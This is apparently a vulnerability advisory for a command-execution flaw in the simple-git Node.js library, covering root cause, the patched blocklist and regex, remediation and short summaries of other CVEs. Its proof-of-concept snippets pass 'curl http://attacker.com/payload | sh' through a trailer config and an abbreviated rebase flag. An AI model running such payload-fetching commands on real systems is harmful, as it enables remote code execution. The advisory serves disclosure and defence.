Oct 6, 2026·5 min read·3 visits
Incomplete configuration blocklists and argument parsing discrepancies in simple-git prior to version 4.0.1 allow remote attackers to achieve arbitrary shell command execution via trailer commands and rebase parameters.
A critical remote code execution vulnerability (CVE-2026-102828) exists in simple-git versions 3.15.0 through 4.0.0. The vulnerability is caused by an incomplete blocklist within the library's default safety enforcement plugin, blockUnsafeOperationsPlugin. Attackers who can control Git configuration arguments or supply command flags to rebase operations can execute arbitrary system commands with the privileges of the parent Node.js process.
The Node.js library simple-git acts as an abstraction layer over the host system's git command-line executable. It uses Node.js's native child process spawning modules to run shell-level actions. Because Git configurations allow severe command execution options, the application trust boundary relies entirely on simple-git blocking dangerous parameters before launching child processes.
To enforce this trust boundary, the library introduced the blockUnsafeOperationsPlugin starting in version 3.15.0. This component functions as an input-filtering engine that intercepts downstream arguments. It references a static blocklist of dangerous configuration options (such as protocol.ext.allow) to neutralize the risk of parameter injection and local command execution.
However, prior to version 4.0.1, this blocklist was incomplete. It did not prevent the configuration of Git's trailer parsing options (trailer.<token>.cmd and trailer.<token>.command), nor did it safely evaluate the -x and --exec options during interactive and non-interactive git rebase operations. Attackers can leverage these gaps to execute arbitrary system commands, bypassing existing input sanitation policies.
The root cause of this vulnerability lies in the design limitation of blocklist-based validation (CWE-184). The blockUnsafeOperationsPlugin assumes that all vectors of code execution inside native Git options can be manually enumerated. This assumption is flawed due to the complexity of Git's subcommand architecture and configuration options.
Git's interpret-trailers utility is designed to parse commit messages for metadata keys. It permits administrators or repository setups to configure external command scripts to evaluate trailer values dynamically via the trailer.<token>.cmd configuration. When a repository operation triggers metadata generation, Git invokes the configured command string within a shell execution context.
Because simple-git's parser did not monitor the trailer.*.cmd and trailer.*.command keys, an attacker capable of passing custom configuration overrides (such as using the -c inline configuration parameter) could define a malicious command handler. Additionally, the library failed to block command-injection options under the rebase subcommand. Git natively supports short-hand abbreviations of long flags, allowing --ex, --exe, and --exec to execute shell commands after commits during rebase procedures. The simple-git input parser lacked regular expressions to cover these abbreviated arguments, allowing complete bypass of the --exec check.
The vulnerability was fixed in the codebase under version 4.0.1. A review of the differences in the vulnerability parser shows how the blocklist rules and validation systems were updated.
In packages/argv-parser/src/vulnerabilities/detect-vulnerable-config-writes.ts, the blocklist was updated to explicitly block wildcard configurations of trailer command variables:
// Before modification:
const preventUnsafeConfig = [
preventConfigBuilder('sequence.editor', 'allowUnsafeEditor'),
preventExpandedConfigBuilder('submodule.update', 'allowUnsafeSubmodule'),
preventExpandedConfigBuilder('tar.command', 'allowUnsafeCommandBinaries'),
preventExpandedConfigBuilder('url.insteadOf', 'allowUnsafeUrlRewrite'),
];
// After modification (Patch Applied):
const preventUnsafeConfig = [
preventConfigBuilder('sequence.editor', 'allowUnsafeEditor'),
preventExpandedConfigBuilder('submodule.update', 'allowUnsafeSubmodule'),
preventExpandedConfigBuilder('tar.command', 'allowUnsafeCommandBinaries'),
+ preventExpandedConfigBuilder('trailer.cmd', 'allowUnsafeCommandBinaries'),
+ preventExpandedConfigBuilder('trailer.command', 'allowUnsafeCommandBinaries'),
preventExpandedConfigBuilder('url.insteadOf', 'allowUnsafeUrlRewrite'),
];In packages/argv-parser/src/vulnerabilities/detect-vulnerable-flags.ts, regex patterns were introduced to intercept the rebase command-execution configurations. It evaluates the exact boundaries and checks Git's parsing of abbreviated options (--ex and --exe matching --exec):
// Regex updates to restrict the rebase command execution parameters:
preventFlagBuilder('rebase', /^(-x|--ex(ec?)?)$/, 'allowUnsafeExec', { name: '-x or --exec' }),Finally, packages/argv-parser/src/tokens/flag-specs.ts registered command specification mappings for rebase, preventing unexpected arguments from bypassing normal option tokenization checks.
To exploit this vulnerability, an attacker must target a Node.js application that uses simple-git and permits external parameters to dictate configuration arguments or repository execution flags.
For example, if an interface exposes the capability to set custom config arguments, an attacker could supply:
import { simpleGit } from 'simple-git';
// The following configuration bypasses blocklist controls in < 4.0.1:
await simpleGit().raw([
'commit',
'-c',
'trailer.exploit.cmd=curl http://attacker.com/payload | sh',
'-m',
'Trigger Commit'
]);During execution, Git's parser resolves the trailer configuration, triggers a shell environment, and executes the specified HTTP download utility. The same vulnerability occurs when invoking the rebase option with short-hand options:
import { simpleGit } from 'simple-git';
// Bypasses the '--exec' filter by using Git's option parser abbreviation logic:
await simpleGit().rebase(['--ex', 'curl http://attacker.com/payload | sh']);The impact of successful exploitation is arbitrary remote code execution (RCE) on the host operating system. The commands run under the same OS privileges as the active Node.js process. If the application runs inside a container with administrative privileges, this vulnerability could lead to total host compromise, lateral network movement, and database exfiltration.
Although version 4.0.1 fixes the known paths for trailer.*.cmd and rebase argument abbreviation, blocklist architectures still carry risks. Git supports a complex ecosystem of configurations that allow shell execution, such as core.pager, gpg.program, and custom difference-viewing drivers. If a downstream web application accepts unvalidated user options, further parser bypasses could emerge.
Security teams should monitor simple-git instances and prohibit passing arbitrary options to configuration parameters. Developers must use structural parameter objects instead of plain user strings inside simple-git execution methods.
The primary remediation step is upgrading the simple-git npm package to version 4.0.1 or higher. This update applies the correct regex-based checks for command arguments and trailer settings.
npm install simple-git@4.0.1If you cannot update immediately, you can implement a workaround by ensuring that the library's unsafe settings are explicitly disabled in your code:
import { simpleGit } from 'simple-git';
// Enforce strict default controls
const git = simpleGit({
unsafe: {
allowUnsafeCommandBinaries: false,
allowUnsafeExec: false
}
});Additionally, apply strict input validation. Avoid passing dynamic user input directly into configuration command matrices. Strip non-alphanumeric characters from input parameters, and ensure that only allowed keys are processed by the repository execution engines.
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
simple-git steveukx | >= 3.15.0, < 4.0.1 | 4.0.1 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-78, CWE-184 |
| Attack Vector | Network |
| CVSS Base Score | 9.2 (Critical) |
| EPSS Score | 0.00275 (0.27% probability of exploitation) |
| Exploit Status | Proof-of-Concept |
| CISA KEV Status | Not Listed |
The software constructs an OS command using externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended OS command when it is sent to a downstream component.
A critical security control bypass vulnerability exists in @simple-git/argv-parser before version 2.0.1. The package fails to map the VISUAL environment variable to the allowUnsafeEditor rule, allowing attackers who control environment parameters to execute arbitrary commands when Git triggers an interactive editor fallback.
A vulnerability in vLLM prior to 0.30.0 allows an authenticated multi-tenant attacker to infer execution history and prompt structures of other tenants. The multi-turn Responses API ('Harmony' path) fails to propagate the 'cache_salt' parameter during tool-call continuation steps, storing sensitive prompt prefixes in the global, unsalted cache space.
A state desynchronization (cache drift) vulnerability exists in the multimodal Inter-Process Communication (IPC) Least Recently Used (LRU) caches of vLLM. When a multimodal request fails validation after its media hash has been registered on the frontend but before the payload is committed to the backend engine core, the frontend and backend caches drift out of lockstep. A subsequent request reusing the same media triggers an assertion failure in the backend engine core, resulting in a complete denial of service.
CVE-2026-105750 is a medium-severity local file disclosure vulnerability affecting the Docling and Docling-Slim libraries. When processing HTML documents using the optional Playwright rendering backend, the application fail to validate and restrict request URIs using the file:// scheme. This permits an attacker supplying a crafted HTML file to access, render, and exfiltrate local system files.
CVE-2026-102598 is a security bypass and Denial of Service (DoS) vulnerability in the Werkzeug WSGI web application library. In versions prior to 3.1.9, the library's safe_join function fails to sanitize Windows reserved device names containing an empty NTFS Alternate Data Stream (ADS) marker (such as NUL:). This allows remote, unauthenticated attackers to trigger indefinite thread-blocking operations on Windows hosts, resulting in application-wide resource exhaustion.
A vulnerability in @graphql-tools/executor-legacy-ws prior to version 1.1.35 hardcodes the TLS rejectUnauthorized setting to false for outgoing secure WebSocket (wss://) connections. This defect allows unauthenticated remote attackers to perform Adversary-in-the-Middle (MitM) attacks, capturing or tampering with sensitive connection payloads and subscription data.